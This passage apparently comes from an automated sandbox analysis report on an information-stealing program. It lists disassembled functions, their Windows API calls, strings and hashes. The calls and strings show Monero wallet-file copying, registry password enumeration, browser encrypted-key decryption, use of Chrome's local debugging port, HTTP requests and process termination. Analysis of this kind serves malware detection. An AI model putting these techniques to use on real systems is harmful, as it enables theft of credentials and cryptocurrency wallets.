                              • Instruction ID: 3db5ff8540544e3b336f5ca22adb5a133b9a511d394a4398e9d92a0d953d76b9
                              • Opcode Fuzzy Hash: 89334d7e4a0fdc27f8bd82c160186ff182e72f3d8d2c61d76b09d7db675f2056
                              • Instruction Fuzzy Hash: A851B475910508ABCB14EBE1DC55FEE7338AF14305F40819EF206A7190EF78AA49CF69
                              Function 004D5510 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004DAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004DAAF6
                                • Part of subcall function 004C62D0: InternetOpenA.WININET(004E0DFF,00000001,00000000,00000000,00000000), ref: 004C6331
                                • Part of subcall function 004C62D0: StrCmpCA.SHLWAPI(?,012AE8D8), ref: 004C6353
                                • Part of subcall function 004C62D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004C6385
                                • Part of subcall function 004C62D0: HttpOpenRequestA.WININET(00000000,GET,?,012AE0E0,00000000,00000000,00400100,00000000), ref: 004C63D5
                                • Part of subcall function 004C62D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004C640F
                                • Part of subcall function 004C62D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004C6421
                                • Part of subcall function 004DABB0: lstrcpy.KERNEL32(?,004E0E1A), ref: 004DAC15
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004D5568
                              • lstrlen.KERNEL32(00000000), ref: 004D557F
                                • Part of subcall function 004D8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 004D8FE2
                              • StrStrA.SHLWAPI(00000000,00000000), ref: 004D55B4
                              • lstrlen.KERNEL32(00000000), ref: 004D55D3
                              • lstrlen.KERNEL32(00000000), ref: 004D55FE
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 3240024479-1526165396
                              • Opcode ID: 8cd2c50297744383a409726615c89e3a24338305d1e017b1e5041af16c97504a
                              • Instruction ID: a240a320a0ffec9d3cd39b7b4f45322f4e9605907e64f9efaa56a8456997f8dc
                              • Opcode Fuzzy Hash: 8cd2c50297744383a409726615c89e3a24338305d1e017b1e5041af16c97504a
                              • Instruction Fuzzy Hash: 3A514C305101089BCB18FF61CDBAAED7379AF10348F50441FE54A576A2EF38AB15CB5A
                              Function 004D1520 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: 5d25bfdb97660cbf0eddff05b742c52cbd74a974453bbbf37161c1016a04717c
                              • Instruction ID: b59bc061bb62546ddaf9b59a55e0a4da750f6ff776cdeae71f5e6e821d67b6df
                              • Opcode Fuzzy Hash: 5d25bfdb97660cbf0eddff05b742c52cbd74a974453bbbf37161c1016a04717c
                              • Instruction Fuzzy Hash: C2C1C4B5900108ABCB14EF60DCA9FEA7379BF54308F00459FF509A7341EA78AA85CF95
                              Function 004D44D0 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004D8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 004D8F9B
                              • lstrcat.KERNEL32(?,00000000), ref: 004D453C
                              • lstrcat.KERNEL32(?,012AE518), ref: 004D455B
                              • lstrcat.KERNEL32(?,?), ref: 004D456F
                              • lstrcat.KERNEL32(?,012AD080), ref: 004D4583
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                                • Part of subcall function 004D8F20: GetFileAttributesA.KERNEL32(00000000,?,004C1B94,?,?,004E577C,?,?,004E0E22), ref: 004D8F2F
                                • Part of subcall function 004CA430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 004CA489
                                • Part of subcall function 004CA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004CA13C
                                • Part of subcall function 004CA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004CA161
                                • Part of subcall function 004CA110: LocalAlloc.KERNEL32(00000040,?), ref: 004CA181
                                • Part of subcall function 004CA110: ReadFile.KERNEL32(000000FF,?,00000000,004C148F,00000000), ref: 004CA1AA
                                • Part of subcall function 004CA110: LocalFree.KERNEL32(004C148F), ref: 004CA1E0
                                • Part of subcall function 004CA110: CloseHandle.KERNEL32(000000FF), ref: 004CA1EA
                                • Part of subcall function 004D9550: GlobalAlloc.KERNEL32(00000000,004D462D,004D462D), ref: 004D9563
                              • StrStrA.SHLWAPI(?,012AE560), ref: 004D4643
                              • GlobalFree.KERNEL32(?), ref: 004D4762
                                • Part of subcall function 004CA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>OL,00000000,00000000), ref: 004CA23F
                                • Part of subcall function 004CA210: LocalAlloc.KERNEL32(00000040,?,?,?,004C4F3E,00000000,?), ref: 004CA251
                                • Part of subcall function 004CA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>OL,00000000,00000000), ref: 004CA27A
                                • Part of subcall function 004CA210: LocalFree.KERNEL32(?,?,?,?,004C4F3E,00000000,?), ref: 004CA28F
                              • lstrcat.KERNEL32(?,00000000), ref: 004D46F3
                              • StrCmpCA.SHLWAPI(?,004E08D2), ref: 004D4710
                              • lstrcat.KERNEL32(00000000,00000000), ref: 004D4722
                              • lstrcat.KERNEL32(00000000,?), ref: 004D4735
                              • lstrcat.KERNEL32(00000000,004E0FA0), ref: 004D4744
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                              • String ID:
                              • API String ID: 3541710228-0
                              • Opcode ID: 88ef23cc410f7fea2fd9bd96f7df61671e8f4ba6a860c3b98fffac304b546e3c
                              • Instruction ID: 3e1f01699a9b310f785e089a8c1759861b9723eabd1780f1869e33334b11c5c8
                              • Opcode Fuzzy Hash: 88ef23cc410f7fea2fd9bd96f7df61671e8f4ba6a860c3b98fffac304b546e3c
                              • Instruction Fuzzy Hash: 8D71AA76910208ABDB14EBA0DC59FEE7379AB88304F00859EF60597241DB38EB55CF59
                              Function 004C1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004C12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004C12B4
                                • Part of subcall function 004C12A0: RtlAllocateHeap.NTDLL(00000000), ref: 004C12BB
                                • Part of subcall function 004C12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004C12D7
                                • Part of subcall function 004C12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 004C12F5
                                • Part of subcall function 004C12A0: RegCloseKey.ADVAPI32(?), ref: 004C12FF
                              • lstrcat.KERNEL32(?,00000000), ref: 004C134F
                              • lstrlen.KERNEL32(?), ref: 004C135C
                              • lstrcat.KERNEL32(?,.keys), ref: 004C1377
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                                • Part of subcall function 004DACC0: lstrlen.KERNEL32(?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004DACD5
                                • Part of subcall function 004DACC0: lstrcpy.KERNEL32(00000000), ref: 004DAD14
                                • Part of subcall function 004DACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004DAD22
                                • Part of subcall function 004DABB0: lstrcpy.KERNEL32(?,004E0E1A), ref: 004DAC15
                                • Part of subcall function 004D8CF0: GetSystemTime.KERNEL32(004E0E1B,012AA480,004E05B6,?,?,004C13F9,?,0000001A,004E0E1B,00000000,?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004D8D16
                                • Part of subcall function 004DAC30: lstrcpy.KERNEL32(00000000,?), ref: 004DAC82
                                • Part of subcall function 004DAC30: lstrcat.KERNEL32(00000000), ref: 004DAC92
                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 004C1465
                                • Part of subcall function 004DAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004DAAF6
                                • Part of subcall function 004CA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004CA13C
                                • Part of subcall function 004CA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004CA161
                                • Part of subcall function 004CA110: LocalAlloc.KERNEL32(00000040,?), ref: 004CA181
                                • Part of subcall function 004CA110: ReadFile.KERNEL32(000000FF,?,00000000,004C148F,00000000), ref: 004CA1AA
                                • Part of subcall function 004CA110: LocalFree.KERNEL32(004C148F), ref: 004CA1E0
                                • Part of subcall function 004CA110: CloseHandle.KERNEL32(000000FF), ref: 004CA1EA
                              • DeleteFileA.KERNEL32(00000000), ref: 004C14EF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                              • API String ID: 3478931302-218353709
                              • Opcode ID: e26c140dc5597c27500f1c72f12e62f12c4e37e2b0a40ef86e58130d3522abfe
                              • Instruction ID: 8f4b24112f36184306cc985b83a6e5f1be3e38d48217bf1768878b3dd2b98fde
                              • Opcode Fuzzy Hash: e26c140dc5597c27500f1c72f12e62f12c4e37e2b0a40ef86e58130d3522abfe
                              • Instruction Fuzzy Hash: 7551A3B19101185BCB14EB61DCA6FED737C9F50304F4045DFB20A62192EE386B99CB6E
                              Function 004C9A50 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 107networkCOMMON
                              Download Yara Rule
                              APIs
                              • InternetOpenA.WININET(004E0AF6,00000001,00000000,00000000,00000000), ref: 004C9A6A
                              • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 004C9AAB
                              • InternetCloseHandle.WININET(00000000), ref: 004C9AC7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$Open$CloseHandle
                              • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                              • API String ID: 3289985339-2144369209
                              • Opcode ID: b72e5ace5e6f2d58fb530fb4a8c0e4f27a0c01e51d3f90cf2a57a342d3d9f47b
                              • Instruction ID: a0ff88fb5f5dc20cdd515df9274fd58ee19be2ab56c74dd71886a696978a6a52
                              • Opcode Fuzzy Hash: b72e5ace5e6f2d58fb530fb4a8c0e4f27a0c01e51d3f90cf2a57a342d3d9f47b
                              • Instruction Fuzzy Hash: F9412E35A50258ABCB14EF95CC99FDD7774BB48740F10409FF505AB290DBB8AE80CB68
                              Function 004C7630 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004C7330: memset.MSVCRT ref: 004C7374
                                • Part of subcall function 004C7330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 004C739A
                                • Part of subcall function 004C7330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004C7411
                                • Part of subcall function 004C7330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 004C746D
                                • Part of subcall function 004C7330: GetProcessHeap.KERNEL32(00000000,?), ref: 004C74B2
                                • Part of subcall function 004C7330: HeapFree.KERNEL32(00000000), ref: 004C74B9
                              • lstrcat.KERNEL32(00000000,004E192C), ref: 004C7666
                              • lstrcat.KERNEL32(00000000,00000000), ref: 004C76A8
                              • lstrcat.KERNEL32(00000000, : ), ref: 004C76BA
                              • lstrcat.KERNEL32(00000000,00000000), ref: 004C76EF
                              • lstrcat.KERNEL32(00000000,004E1934), ref: 004C7700
                              • lstrcat.KERNEL32(00000000,00000000), ref: 004C7733
                              • lstrcat.KERNEL32(00000000,004E1938), ref: 004C774D
                              • task.LIBCPMTD ref: 004C775B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                              • String ID: :
                              • API String ID: 3191641157-3653984579
                              • Opcode ID: a2dc543b80b685839a98504a069d7a4c67bcc5d74a80f774ac3cdb4b788447ce
                              • Instruction ID: 5b07481e4e477d7f8801fd9ea54998f51c7b048a8454d8b98981afa2914980d4
                              • Opcode Fuzzy Hash: a2dc543b80b685839a98504a069d7a4c67bcc5d74a80f774ac3cdb4b788447ce
                              • Instruction Fuzzy Hash: 30314F75A14108DFDB48EBA5DCA6EFE7379AB44305B10821EF102672A1DE3CA946CB5C
                              Function 004C7330 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • memset.MSVCRT ref: 004C7374
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 004C739A
                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004C7411
                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 004C746D
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 004C74B2
                              • HeapFree.KERNEL32(00000000), ref: 004C74B9
                              • task.LIBCPMTD ref: 004C75B5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$EnumFreeOpenProcessValuememsettask
                              • String ID: Password
                              • API String ID: 2808661185-3434357891
                              • Opcode ID: 79f5ab4929fc9aef44e510632b305c38b3fcca1592c9af94e2412d17b2d53a0c
                              • Instruction ID: fdc31df0d24c33b72dfd5afd4baff93dd157f161e9d9a220458c7204eccd6893
                              • Opcode Fuzzy Hash: 79f5ab4929fc9aef44e510632b305c38b3fcca1592c9af94e2412d17b2d53a0c
                              • Instruction Fuzzy Hash: 11614BB58141689BDB64DB51CC41FDAB3B8BF44304F0081EEE689A6241DFB46BC9CF98
                              Function 004C9E30 Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 163stringsleepCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004D8CF0: GetSystemTime.KERNEL32(004E0E1B,012AA480,004E05B6,?,?,004C13F9,?,0000001A,004E0E1B,00000000,?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004D8D16
                              • wsprintfA.USER32 ref: 004C9E7F
                              • memset.MSVCRT ref: 004C9EED
                              • lstrcat.KERNEL32(00000000,?), ref: 004C9F03
                              • lstrcat.KERNEL32(00000000,?), ref: 004C9F17
                              • lstrcat.KERNEL32(00000000,004E12D8), ref: 004C9F29
                              • lstrcpy.KERNEL32(?,00000000), ref: 004C9F7C
                              • memset.MSVCRT ref: 004C9F9C
                              • Sleep.KERNEL32(00001388), ref: 004CA013
                                • Part of subcall function 004D99A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004D99C5
                                • Part of subcall function 004D99A0: Process32First.KERNEL32(004CA056,00000128), ref: 004D99D9
                                • Part of subcall function 004D99A0: Process32Next.KERNEL32(004CA056,00000128), ref: 004D99F2
                                • Part of subcall function 004D99A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 004D9A4E
                                • Part of subcall function 004D99A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 004D9A6C
                                • Part of subcall function 004D99A0: CloseHandle.KERNEL32(00000000), ref: 004D9A79
                                • Part of subcall function 004D99A0: CloseHandle.KERNEL32(004CA056), ref: 004D9A88
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
